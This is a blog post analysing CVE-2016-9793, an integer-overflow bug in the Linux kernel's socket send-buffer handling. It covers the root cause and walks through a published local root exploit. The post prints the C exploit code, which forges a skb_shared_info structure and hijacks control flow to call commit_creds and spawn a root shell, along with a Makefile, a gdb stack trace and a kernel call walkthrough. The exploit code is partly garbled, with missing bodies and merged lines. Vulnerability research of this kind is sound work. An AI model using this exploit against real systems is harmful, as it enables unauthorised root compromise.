Analysis on CVE-2016-9793


This is a integer overflow vulnerability in Linux Kernel. The exploit code can be found on [1]. This post will mainly discuss on the root cause of this CVE and how the exploit works in the end.

Root Cause Analysis

		sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
		sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
                /* val is an input from user space, sk_sndbuf is an int type*/
		/* Wake up sending tasks if we upped the value. */

#define max_t(type, x, y) ({			\
	type __max1 = (x);			\
	type __max2 = (y);			\
	__max1 > __max2 ? __max1 : __max2; })

In the code above, sk_sndbuf is an int type value but a u32-type value is assigned to this in this code. An attacker can craft a very large unsigned int value to val to make sk_sndbuf a negative number.

Exploit Analysis


//Tested on Ubuntu 14.04 with Linux-4.2.0
#define _GNU_SOURCE

#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>

#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define COMMIT_CREDS 0xffffffff81096d90//0xffffffff81079860ul
#define PREPARE_KERNEL_CRED 0xffffffff81097080//0xffffffff81079b20ul

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root(void) {

int halt(int count){
	int x;
	printf("%d\n", count);
	scanf("%d", &x);
	return x;

struct ubuf_info_t {
  uint64_t callback;        // void (*callback)(struct ubuf_info *, bool)
  uint64_t ctx;             // void *
  uint64_t desc;            // unsigned long

struct skb_shared_info_t {
  uint8_t  nr_frags;        // unsigned char
  uint8_t  tx_flags;        // __u8
  uint16_t gso_size;        // unsigned short
  uint16_t gso_segs;        // unsigned short
  uint16_t gso_type;        // unsigned short
  uint64_t frag_list;       // struct sk_buff *
  uint64_t hwtstamps;       // struct skb_shared_hwtstamps
  uint32_t tskey;           // u32
  uint32_t ip6_frag_id;     // __be32
  uint32_t dataref;         // atomic_t
  uint64_t destructor_arg;  // void *
  uint8_t  frags[16][17];   // skb_frag_t frags[MAX_SKB_FRAGS];

// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
#define SNDBUF 0xffffff00
#define SHINFO 0x00000000fffffed0ul

struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;

#define SKBTX_DEV_ZEROCOPY (1 << 3) void* skb_thr(void* arg) { 	while (1) { 		skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
		skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;

int sockets[2];

void *write_thr(void *arg) {
	// Write blocks until setsockopt(SO_SNDBUF).
	write(sockets[1], "\x5c", 1);

	if (getuid() == 0) {
		printf("[+] got r00t\n");
		execl("/bin/bash", "bash", NULL);
	printf("[-] something went wrong\n");

int main() {
	void *addr;
	int rv;
	uint32_t sndbuf;

	addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,
		-1, 0);
	if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {

	printf("[.] userspace payload mmapped at %p\n", addr);

 	pthread_t skb_th;
    	rv = pthread_create(&skb_th, 0, skb_thr, NULL);
	if (rv != 0) {

	printf("[.] overwriting thread started\n");

	rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
	if (rv != 0) {

	printf("[.] sockets opened\n");

	sndbuf = SNDBUF;
	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
			&sndbuf, sizeof(sndbuf));
	if (rv != 0) {

	printf("[.] sock->sk_sndbuf set to %x, %d\n", SNDBUF * 2, SNDBUF*2);
	pthread_t write_th;
	rv = pthread_create(&write_th, 0, write_thr, NULL);
	if (rv != 0) {

	printf("[.] writing to socket\n");

	// Wake up blocked write.
	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
			&sndbuf, sizeof(sndbuf));
	if (rv != 0) {


	return 0;


FLAGS := -staticLFLAGS := -lutil -lpthreadALL := poc
all: $(ALL)
poc: poc.c $(CC) $(CFLAGS) -o $@ $< $(LFLAGS) sudo setcap cap_net_admin+ep $(ALL)
clean: rm -rf $(ALL)
.PHONY: all clean

And the final exploit looks like the following thing

Exploit Procedure

Here we are going to explain how to hijack control flow in the final. First we give the stacktrace when setting the function pointer to be 0xffffdeaddeadbeef.

#0  0xffffdeaddeadbeef in ?? ()
#1  0xffffffff8168cf95 in skb_release_data (skb=0xffff880078c15100) at net/core/skbuff.c:594
#2  0xffffffff8168d008 in skb_release_all (skb=0xffff880078c15100) at net/core/skbuff.c:659
#3  0xffffffff8168d076 in __kfree_skb (skb=<optimized out>) at net/core/skbuff.c:673
#4  kfree_skb (skb=0xffff880078c15100) at net/core/skbuff.c:694
#5  0xffffffff8173d5d5 in unix_stream_sendmsg (sock=<optimized out>, msg=<optimized out>, len=<optimized out>) at net/unix/af_unix.c:1704
#6  0xffffffff81685128 in sock_sendmsg_nosec (msg=<optimized out>, sock=<optimized out>) at net/socket.c:610
#7  sock_sendmsg (sock=0xffff8800785a9180, msg=0xffff880078cb7dc0) at net/socket.c:620
#8  0xffffffff816851b8 in sock_write_iter (iocb=<optimized out>, from=0xffff880078cb7e70) at net/socket.c:819
#9  0xffffffff811e94d7 in new_sync_write (ppos=<optimized out>, len=<optimized out>, buf=<optimized out>, filp=<optimized out>) at fs/read_write.c:478
#10 __vfs_write (file=0xffff88007a61e400, p=<optimized out>, count=<optimized out>, pos=0xffff880078cb7f20) at fs/read_write.c:491
#11 0xffffffff811e9b39 in vfs_write (file=0x6020b0, buf=0x400cc8 "\\", count=<optimized out>, pos=0xffff880078cb7f20) at fs/read_write.c:538
#12 0xffffffff811ea8a6 in SYSC_write (count=<optimized out>, buf=<optimized out>, fd=<optimized out>) at fs/read_write.c:585
#13 SyS_write (fd=<optimized out>, buf=4197576, count=1) at fs/read_write.c:577
#14 0xffffffff817a8c72 in entry_SYSCALL_64_fastpath () at arch/x86/entry/entry_64.S:186

According to the information collected, I review the source code backward starting from the line 1672-1702 in net/unix/af_unix.c.

size = len - sent;

/* Keep two messages in the pipe so it schedules better */
/* size is overwritten with a negative value here */
size = min_t(int, size, (sk->sk_sndbuf >> 1) - 64);

/* allow fallback to order-0 allocations */
size = min_t(int, size, SKB_MAX_HEAD(0) + UNIX_SKB_FRAGS_SZ);

data_len = max_t(int, 0, size - SKB_MAX_HEAD(0));

data_len = min_t(size_t, size, PAGE_ALIGN(data_len));
/* sk->sk_sndbuf is 0xffffff00(-512), size is 0xfffffec0(-320), data_len is 0*/
skb = sock_alloc_send_pskb(sk, size - data_len, data_len,
			msg->msg_flags & MSG_DONTWAIT, &err,
if (!skb)
	goto out_err;

/* Only send the fds in the first buffer */
err = unix_scm_to_skb(&scm, skb, !fds_sent);
if (err < 0) {
	goto out_err;
max_level = err + 1;
fds_sent = true;

skb_put(skb, size - data_len);
skb->data_len = data_len;
skb->len = size;
err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, size);
if (err) {   //line 1703
	goto out_err;

The final callsite that triggers control flow hijacking takes place in skb_release_data in net/core/skbuff.c.

static void skb_release_data(struct sk_buff *skb)
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

	if (skb->cloned &&
	    atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,

	for (i = 0; i < shinfo->nr_frags; i++)

	 * If skb buf is from userspace, we need to notify the caller
	 * the lower device DMA has done;
	if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
		struct ubuf_info *uarg;

		uarg = shinfo->destructor_arg;
		if (uarg->callback)
			uarg->callback(uarg, true);  // hijack control flow to 0xfffffce0

	if (shinfo->frag_list)


After the values in size and data_len were overwritten with attacker’s controlled data, the control flow goes into the sock_alloc_send_pskb below to set skb_buff. The allocation process goes as following

sock_alloc_send_pskb(sk, 0xfffffec0, 0, ...)
|---alloc_skb_with_frags(0xfffffec0, 0, ...)
----|----alloc_skb(0xfffffec0, gfp_head)
---------|----__alloc_skb(0xfffffec0, ...)
--------------|----data = kmalloc_reserve(0xfffffec0, ...)
// allocation fail, the return value of alloc is NULL,
// return value of kmalloc_reserve is 0x10
--------------|----skb->head = data;
--------------|----skb->data = data;
--------------|----skb_reset_tail_pointer(skb);  //skb->tail is set 0xfffffec0
--------------|----skb->end = skb->tail + size;  //skb->tail is set 0xfffffec0
//The final result for struct sk_buff skb* is
(gdb) p *(struct sk_buff*)( 0xffff88007a33a900)$2 = {headers_end = 0xffff88007a33a9c8, tail = 4294966976, end = 4294966976, head = 0x10 <irq_stack_union+16>, data = 0x10}

Another thing to note is that the exploit creates a thread to overwrite crafted skb_shared_info member variable repeatedly. That is because of the code below:

shinfo = skb_shinfo(skb);
memset(shinfo, 0, offsetof(struct skb_shared_info, dataref));
atomic_set(&shinfo->dataref, 1);

After the failure of allocation, the data in shinfo is reset to 0.  Attacker needs to trigger a race-condition here to rewrite desired value into the crafted object.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s